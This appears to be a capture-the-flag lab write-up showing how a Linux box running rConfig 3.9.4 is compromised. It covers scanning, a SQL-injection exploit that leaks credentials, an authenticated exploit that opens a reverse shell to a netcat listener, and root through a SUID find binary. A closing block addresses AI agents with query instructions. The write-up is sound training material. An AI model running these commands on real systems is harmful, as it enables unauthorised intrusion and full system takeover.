# Quackerjack

![](/files/-MRvTrnOX9Tx1ys4pFd-)

## Nmap

```
sudo nmap 192.168.150.57 -sS -p- -sV 

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.2
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
3306/tcp open  mysql       MariaDB (unauthorized)
8081/tcp open  ssl/http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
Service Info: Host: QUACKERJACK; OS: Unix
```

## FTP

I performed a quick check for anonymous login on FTP and was returned a logon error.

![](/files/-MRR54oskq7QKh2HlGfy)

## SMB

As we have no luck with FTP I then run `enum4linux` against the target to look for users, groups and to perform RID cycling.

```
enum4linux -U -G -r 192.168.189.98
```

Unfortunately `enum4linux` did not return any relevant users information. I also checked null authentication against the target.

```
smbmap -u '' -p '' -R -H 192.168.150.57
```

![](/files/-MRR7-I6cYpIGjjdHhst)

## HTTP

As we have HTTP running on port 80 and 8081 we can run `gobuster` against these ports.

```
gobuster dir -u http://192.168.150.57 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200 -x txt,zip,php
gobuster dir -u https://192.168.150.57:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200 -x txt,zip,php -k
```

![](/files/-MRRi-1RE3kjqkNNUdgJ)

The default page for 80 brings us to a CentOS Apache test page.

![](/files/-MRRi8Xf-Qp-YoXn_rsN)

On port 8081 we come to a login page for rConfig. As we can see from the landing page rConfig is running on version 3.9.4.

![](/files/-MRR8BfzO3zx2ioZI5Wi)

## Exploitation

A Google search reveals a multitude of exploits for this for varying versions. I went thought a fair few some of which I could not get to work which are specific to 3.9.4. Eventually I come across a SQL injection exploit.

![](/files/-MRR8yKsev_XaGP3faly)

{% embed url="<https://www.exploit-db.com/exploits/48208>" %}

Run the exploit with the following syntax.

```
python3 exploit.py https://192.168.150.57:8081
```

![](/files/-MRR9_25e5S_bPdng-_R)

We manage to extract a hash. I identified this as a MD5 hash and was not able to crack with `John` using the rockyou.txt. I ended putting the hash into online databases to find a match.

{% embed url="<https://www.md5online.org/md5-decrypt.html>" %}

![](/files/-MRRA5sUI7lrc6X9xuxT)

We now have the following credentials for rConfig.

```
admin:abgrtyu
```

![](/files/-MRRiMoz5KJ1TEAUdqEf)

## Exploitation (Authenticated)

Now that we are authenticated we can search for authenticated exploits. I soon come across an authenticated remote code execution exploit for 3.9.3. Whilst not intended for the version we have 3.9.4 we can try it anyway.

{% embed url="<https://www.exploit-db.com/exploits/47982>" %}

Looking at the exploit code looks like we supply the arguments below and in return the payload will attempt a bash reverse shell back to us.

![](/files/-MRRYh9_jMqNAUWa-6K3)

First set up a `netcat` listener on our attacking machine. I am going to use port 80 this is a common port for outbound traffic.

```
sudo nc -lvp 80
```

Then execute the exploit with the following syntax:

```
python3 ./exploit.py https://<Target-IP>:8081 admin abgrtyu <Attacking-IP> 80
```

Once we have run the exploit we should get a shell back on our listener.

![](/files/-MRR_dlhwrhwK9PlaOR5)

We confirm we are the apache user.

## Privilege Escalation

In the home directory we have the user 'rConfig'. I grabbed the local.txt flag and then started a `Python SimpleHTTPServer` on my attacking machine. I then uploaded `linpeas.sh` to aid with privilege escalation.

![](/files/-MRRaeDCioD5-eNvSqJT)

After running `linpeas` and going through the results we actually have various potential exploits. I will be focusing on the SUID being set on the find binary.

![](/files/-MRRg9Cvo2zfXStw0sbY)

We can check on [GTFObins](https://gtfobins.github.io/gtfobins/find/) for how we cab use the binary for privilege escalation.

![](/files/-MRRgUPn79krNdkgVzDn)

Lets use the syntax above and call the binary and see if we can escape the restricted shell as root.

```
/usr/bin/find . -exec /bin/sh -p \; -quit
```

Once we escape we should have a root shell.

![](/files/-MRRgo8AWTovVDnbZec2)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/quackerjack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.